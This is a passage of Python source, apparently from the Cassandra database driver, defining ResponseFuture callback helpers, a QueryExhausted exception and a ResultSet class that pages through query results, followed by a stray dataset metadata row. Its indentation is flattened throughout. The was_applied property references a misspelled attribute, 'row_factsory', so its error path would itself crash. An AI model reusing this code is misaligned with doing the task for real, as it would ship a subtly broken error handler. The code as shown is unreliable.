with self._callback_lock:
if self._final_exception:
run_now = True
else:
self._errbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_exception, *args, **kwargs)
return self
def add_callbacks(self, callback, errback,
callback_args=(), callback_kwargs=None,
errback_args=(), errback_kwargs=None):
"""
A convenient combination of :meth:`.add_callback()` and
:meth:`.add_errback()`.
Example usage::
>>> session = cluster.connect()
>>> query = "SELECT * FROM mycf"
>>> future = session.execute_async(query)
>>> def log_results(results, level='debug'):
... for row in results:
... log.log(level, "Result: %s", row)
>>> def log_error(exc, query):
... log.error("Query '%s' failed: %s", query, exc)
>>> future.add_callbacks(
... callback=log_results, callback_kwargs={'level': 'info'},
... errback=log_error, errback_args=(query,))
"""
self.add_callback(callback, *callback_args, **(callback_kwargs or {}))
self.add_errback(errback, *errback_args, **(errback_kwargs or {}))
def clear_callbacks(self):
with self._callback_lock:
            self._callbacks = []
            self._errbacks = []
def __str__(self):
result = "(no result yet)" if self._final_result is _NOT_SET else self._final_result
return "<ResponseFuture: query='%s' request_id=%s result=%s exception=%s host=%s>" \
% (self.query, self._req_id, result, self._final_exception, self._current_host)
__repr__ = __str__
class QueryExhausted(Exception):
"""
Raised when :meth:`.ResponseFuture.start_fetching_next_page()` is called and
there are no more pages. You can check :attr:`.ResponseFuture.has_more_pages`
before calling to avoid this.
.. versionadded:: 2.0.0
"""
pass
class ResultSet(object):
"""
An iterator over the rows from a query result. Also supplies basic equality
    and indexing methods for backward-compatibility. These methods materialize
the entire result set (loading all pages), and should only be used if the
total result size is understood. Warnings are emitted when paged results
are materialized in this fashion.
You can treat this as a normal iterator over rows::
>>> from cassandra.query import SimpleStatement
>>> statement = SimpleStatement("SELECT * FROM users", fetch_size=10)
>>> for user_row in session.execute(statement):
... process_user(user_row)
Whenever there are no more rows in the current page, the next page will
be fetched transparently. However, note that it *is* possible for
an :class:`Exception` to be raised while fetching the next page, just
like you might see on a normal call to ``session.execute()``.
"""
def __init__(self, response_future, initial_response):
self.response_future = response_future
self.column_names = response_future._col_names
self._set_current_rows(initial_response)
self._page_iter = None
self._list_mode = False
@property
def has_more_pages(self):
"""
True if the last response indicated more pages; False otherwise
"""
return self.response_future.has_more_pages
@property
def current_rows(self):
"""
The list of current page rows. May be empty if the result was empty,
or this is the last page.
"""
return self._current_rows or []
def __iter__(self):
if self._list_mode:
return iter(self._current_rows)
self._page_iter = iter(self._current_rows)
return self
def next(self):
try:
return next(self._page_iter)
except StopIteration:
if not self.response_future.has_more_pages:
if not self._list_mode:
self._current_rows = []
raise
self.fetch_next_page()
self._page_iter = iter(self._current_rows)
return next(self._page_iter)
__next__ = next
def fetch_next_page(self):
"""
Manually, synchronously fetch the next page. Supplied for manually retrieving pages
        and inspecting :attr:`~.current_rows`. It is not necessary to call this when iterating
through results; paging happens implicitly in iteration.
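        A minimal sketch of manual paging (assumes ``statement`` uses a small ``fetch_size``)::
            >>> result = session.execute(statement)
            >>> first_page = result.current_rows
            >>> if result.has_more_pages:
            ...     result.fetch_next_page()
            ...     second_page = result.current_rows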
"""
if self.response_future.has_more_pages:
self.response_future.start_fetching_next_page()
result = self.response_future.result()
self._current_rows = result._current_rows # ResultSet has already _set_current_rows to the appropriate form
else:
self._current_rows = []
def _set_current_rows(self, result):
if isinstance(result, Mapping):
self._current_rows = [result] if result else []
return
try:
iter(result) # can't check directly for generator types because cython generators are different
self._current_rows = result
except TypeError:
self._current_rows = [result] if result else []
def _fetch_all(self):
self._current_rows = list(self)
self._page_iter = None
def _enter_list_mode(self, operator):
if self._list_mode:
return
if self._page_iter:
raise RuntimeError("Cannot use %s when results have been iterated." % operator)
if self.response_future.has_more_pages:
log.warning("Using %s on paged results causes entire result set to be materialized.", operator)
self._fetch_all() # done regardless of paging status in case the row factory produces a generator
self._list_mode = True
def __eq__(self, other):
self._enter_list_mode("equality operator")
return self._current_rows == other
def __getitem__(self, i):
self._enter_list_mode("index operator")
return self._current_rows[i]
def __nonzero__(self):
return bool(self._current_rows)
__bool__ = __nonzero__
def get_query_trace(self, max_wait_sec=None):
"""
Gets the last query trace from the associated future.
See :meth:`.ResponseFuture.get_query_trace` for details.
"""
return self.response_future.get_query_trace(max_wait_sec)
def get_all_query_traces(self, max_wait_sec_per=None):
"""
Gets all query traces from the associated future.
See :meth:`.ResponseFuture.get_all_query_traces` for details.
"""
return self.response_future.get_all_query_traces(max_wait_sec_per)
@property
def was_applied(self):
"""
For LWT results, returns whether the transaction was applied.
Result is indeterminate if called on a result that was not an LWT request.
        Only valid when one of the internal row factories is in use.
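        A hedged sketch (table, columns, and values are hypothetical)::
            >>> result = session.execute(
            ...     "INSERT INTO users (id, name) VALUES (1, 'x') IF NOT EXISTS")
            >>> if not result.was_applied:
            ...     log.debug("row already existed")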
"""
if self.response_future.row_factory not in (named_tuple_factory, dict_factory, tuple_factory):
raise RuntimeError("Cannot determine LWT result with row factory %s" % (self.response_future.row_factsory,))
if len(self.current_rows) != 1:
raise RuntimeError("LWT result should have exactly one row. This has %d." % (len(self.current_rows)))
row = self.current_rows[0]
if isinstance(row, tuple):
return row[0]
else:
return row['[applied]']
| apache-2.0 | -163,086,977,530,493,200 | 39.937397 | 187 | 0.613633 | false |